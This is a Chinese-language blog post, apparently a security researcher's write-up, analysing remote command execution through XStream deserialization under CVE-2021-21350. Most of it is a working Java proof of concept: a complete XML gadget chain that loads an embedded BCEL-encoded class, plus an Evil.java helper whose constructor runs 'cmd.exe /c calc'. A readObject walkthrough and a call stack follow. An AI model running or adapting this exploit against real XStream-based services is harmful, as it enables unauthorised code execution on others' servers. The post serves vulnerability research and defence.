Xstream反序列化命令执行研究(CVE-2021-21350)

前言

主要是宽字节发了泛微的xstream反序列化0day,就看了下xstream的CVE-2021-21350利用

代码分析

CVE_2021_21350.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
import com.thoughtworks.xstream.XStream;

public class CVE_2021_21350 {
    public static void main(String args[]){
        String xml="<java.util.PriorityQueue serialization='custom'>\n" +
                "  <java.util.PriorityQueue>\n" +
                "    <default>\n" +
                "      <size>2</size>\n" +
                "      <comparator class='javafx.collections.ObservableList$1'/>\n" +
                "    </default>\n" +
                "    <int>3</int>\n" +
                "    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
                "      <dataHandler>\n" +
                "        <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>\n" +
                "          <contentType>text/plain</contentType>\n" +
                "          <is class='java.io.SequenceInputStream'>\n" +
                "            <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>\n" +
                "              <iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>\n" +
                "                <names class='java.util.AbstractList$Itr'>\n" +
                "                  <cursor>0</cursor>\n" +
                "                  <lastRet>-1</lastRet>\n" +
                "                  <expectedModCount>0</expectedModCount>\n" +
                "                  <outer-class class='java.util.Arrays$ArrayList'>\n" +
                "                    <a class='string-array'>\n" +
                "<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$85T$e9R$d3P$U$fe$$$E$SB$d8$ca$s$e2$82Z$b5e$L$9b$ca$sB$b1$uZ$WY$F$7e$a5$e1Z$$$93$s$9d$qe$e0y$7c$C$fdQ$Yu$7c$A$l$ca$f1$dc$Wi$95$3av$s$f7$f4$9c$7b$96$ef$9c$ef$q$3f$7e$7e$f9$O$60$i$H$3a$o$88$eb$e8$c7$80$86A$v$87T$Mk0u$8c$60T$c7$Y$c6$e51$a1$e3$J$9e$aax$a6$a3$Rq$N$93RN$c9c$ba$B3$98$d5$f1$is$w$5e0$d4$cf$KW$84s$M$b5$b1$f8$O$83$b2$e8$jr$86$96$94p$f9j$3e$9b$e6$fe$96$95v$c8$SIy$b6$e5$ecX$be$90$fa$a5Q$J$8fD$409R$c9$T$e1$cc0$e8$c9S$9b$e7B$e1$b9$81$8ay$ba$cfZ$c2e$e8$8a$j$a4$8e$ad$T$cbt$y7cn$86$bep33$c5j$96$9f$a1$f8$f6$w$d7$M$8d$c2$cd$e5CR$b9$95e$e8$y$b9$I$cf$5c$$$9b$c9$ab$$$7d$Wr$caQs$90$a0$7cv$R$7d$a4Z$3a$rms$87$mnzy$df$e6KB$e2o$90$b8$87$a5$b3$81vt$a8X0$90$c0$o$f5og$P$87$f9$v$ef3$ed$3ej$db6$f0$SI$ca$n$fde$9b2$ccv$ac$80$da$5c2$f0$K$afU$y$hx$83$b7$GRXQ$b1j$60$N$eb$M$dd$7f$DI$e4$85s$c8$7d$G$z$gM$y$sS$d1$a8$81w$d80$b0$89$z$V$db$Gv$b0$ab$e2$bd$81$3d$ec3$b4$96$c3$d7$d2$c7$dc$OiVWcX$bb$g6C$5b$d9q$p$ef$86$oK$cd$e9$Z$k$5e$v$9d$b1x$ea$9a$8f$9c$K5i3$3c$8eU$n$a8$c2$b4$ee$7b6$P$C$Kh$v$h$X$e5$A$I$91$ac$c3$83$e2X$X$82$df$7c$c5$ff$9d$f1$g$87$edU$ccD$O$Z$85SZ4Z$cee$CK$X$87Dy$ec$m$n$d51$db$cb$9aA$de5$3d$3fcZ9$cb$3e$e2$a6$q$d9$Un$c8$7d$d7r$cc$oE$l$88js$3b$U$8e$I$cfhW$b9$5bZ$92n$ca$b2$l$af$b6$v$f5V$$$c7$5d$w4$f4$9f$a9$fcA$v$Fj$a1W21t$c4$aa$a6$ae$mt$f3$y$I9$b5Y$eb$e5$c3$ca$f5$5e$t$d7$w$a3$a903$a89$a99$ae$e4$b5$da$9b$85$7b$a8$a3$ef$84$fc$d5$80$c9$d5$s$d9I$da$7cQ$H$9a$fb$cf$c1$$P$T$a9$z$40$d9$fdT$f4$eb$92v$d4$d2$a9B$81$86$s4$a0$9b4$a3$U$81$h$e8$ny$93$k$85$y$bdt$7b$L$b7$_$f3$7e$qYGr$wR$X$a9$_$40M$N$U$a0$7d$d3V$G$G$Lh$d8$jT$$$a0$af$7eE$e3$de9$8cHS$B$cdC$f4$U$d02$ad$7cFk$8fR$40$5b$Z$c2$j$w$_$8bJ$A$zT$b6$93$ce$5e$b4$d2$e7$ad$N$93$d4$94$844Q$wF$bewIj$YE$l$b5L$cbI$df$c3$fbx$40$99z$e9$$$8a$87$d4$ce$I$B$7dD$ff$94$K$e8$b4$f0$c5z$b1_$f0$e4$89$DX$F$A$A</string>"+
                "                    </a>\n" +
                "                  </outer-class>\n" +
                "                </names>\n" +
                "                <processorCL class='com.sun.org.apache.bcel.internal.util.ClassLoader'>\n" +
                "                  <parent class='sun.misc.Launcher$ExtClassLoader'>\n" +
                "                  </parent>\n" +
                "                  <package2certs class='hashtable'/>\n" +
                "                  <classes defined-in='java.lang.ClassLoader'/>\n" +
                "                  <defaultDomain>\n" +
                "                    <classloader class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='../..'/>\n" +
                "                    <principals/>\n" +
                "                    <hasAllPerm>false</hasAllPerm>\n" +
                "                    <staticPermissions>false</staticPermissions>\n" +
                "                    <key>\n" +
                "                    </key>\n" +
                "                  </defaultDomain>\n" +
                "      <domains class=\"java.util.Collections$SynchronizedSet\" serialization=\"custom\">\n" +
                "        <java.util.Collections_-SynchronizedCollection>\n" +
                "          <default>\n" +
                "            <c class=\"set\">\n" +
                "              <java.security.ProtectionDomain>\n" +
                "                <classloader class=\"sun.misc.Launcher$ExtClassLoader\" reference=\"../../../../../..\"/>\n" +
                "                <principals/>\n" +
                "              \n" +
                "                <hasAllPerm>false</hasAllPerm>\n" +
                "                <staticPermissions>false</staticPermissions>\n" +
                "                <key/>\n" +
                "              </java.security.ProtectionDomain>\n" +
                "            </c>\n" +
                "            <mutex class=\"java.util.Collections$SynchronizedSet\" reference=\"../../..\"/>\n" +
                "          </default>\n" +
                "        </java.util.Collections_-SynchronizedCollection>\n" +
                "      </domains>"+
                "                  <packages/>\n" +
                "                  <nativeLibraries/>\n" +
                "                  <assertionLock class='com.sun.org.apache.bcel.internal.util.ClassLoader' reference='..'/>\n" +
                "                  <defaultAssertionStatus>false</defaultAssertionStatus>\n" +
                "                  <classes/>\n" +
                "                  <ignored__packages>\n" +
                "                    <string>java.</string>\n" +
                "                    <string>javax.</string>\n" +
                "                    <string>sun.</string>\n" +
                "                  </ignored__packages>\n" +
                "                  <repository class='com.sun.org.apache.bcel.internal.util.SyntheticRepository'>\n" +
                "                    <__path>\n" +
                "                      <paths/>\n" +
                "                      <class__path>.</class__path>\n" +
                "                    </__path>\n" +
                "                    <__loadedClasses/>\n" +
                "                  </repository>\n" +
                "                  <deferTo class='sun.misc.Launcher$ExtClassLoader' reference='../parent'/>\n" +
                "                </processorCL>\n" +
                "              </iterator>\n" +
                "              <type>KEYS</type>\n" +
                "            </e>\n" +
                "            <in class='java.io.ByteArrayInputStream'>\n" +
                "              <buf></buf>\n" +
                "              <pos>0</pos>\n" +
                "              <mark>0</mark>\n" +
                "              <count>0</count>\n" +
                "            </in>\n" +
                "          </is>\n" +
                "          <consumed>false</consumed>\n" +
                "        </dataSource>\n" +
                "        <transferFlavors/>\n" +
                "      </dataHandler>\n" +
                "      <dataLen>0</dataLen>\n" +
                "    </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>\n" +
                "    <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>\n" +
                "  </java.util.PriorityQueue>\n" +
                "</java.util.PriorityQueue>";
        XStream xstream = new XStream();
        xstream.fromXML(xml);
    }
}

Evil.java

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.io.IOException;
import java.io.InputStream;

public class Evil {

    public Evil() throws IOException {
        Runtime.getRuntime().exec("cmd.exe /c calc");
    }

    public static void main(String[] args) throws IOException {
        InputStream inputStream = Evil.class.getResourceAsStream("Evil.class");
        byte[] bytes = new byte[inputStream.available()];
        inputStream.read(bytes);
        String code = Utility.encode(bytes, true);
        String bcel = "$$BCEL$$" + code;
        System.out.println(bcel);
    }
}

payload如上,对官方发的payload进行修改,思路参考了宽字节安全的文章:https://mp.weixin.qq.com/s/iTP9jBypsJEsSlAIaNOnhw

该反序列化主要用到的点为利用

1
2
<java.util.PriorityQueue serialization='custom'>
</java.util.PriorityQueue>

调用内部xml反序列化后类的readObject,也就是调用PriortyQueue的readObject方法

image-20210515202459693

1
2
3
4
5
6
s.defaultReadObject()
对应
 <default>
      <size>2</size>
      <comparator class='javafx.collections.ObservableList$1'/>
 </default>
1
2
3
s.readInt()
对应
<int>3</int>
1
2
3
4
s.readObject()
对应
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>xxxx</com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>

最终贴上调用链

1
2
3
4
5
6
7
8
9
10
11
12
at com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator.hasNext(JavacProcessingEnvironment.java:423)
	at javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator.hasMoreElements(MultiUIDefaults.java:148)
	at java.io.SequenceInputStream.nextStream(SequenceInputStream.java:109)
	at java.io.SequenceInputStream.read(SequenceInputStream.java:211)
	at com.sun.xml.internal.bind.v2.util.ByteArrayOutputStreamEx.readFrom(ByteArrayOutputStreamEx.java:65)
	at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.get(Base64Data.java:182)
	at com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString(Base64Data.java:286)
	at javafx.collections.ObservableList$1.compare(ObservableList.java:153)
	at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:721)
	at java.util.PriorityQueue.siftDown(PriorityQueue.java:687)
	at java.util.PriorityQueue.heapify(PriorityQueue.java:736)
	at java.util.PriorityQueue.readObject(PriorityQueue.java:795)

可以看到主要还是触发com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data.toString方法,和之前一样,只不过这次触发选择了PriorityQueue反序列化进行触发。

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

huahua<br><br>虚心学习,不断进步。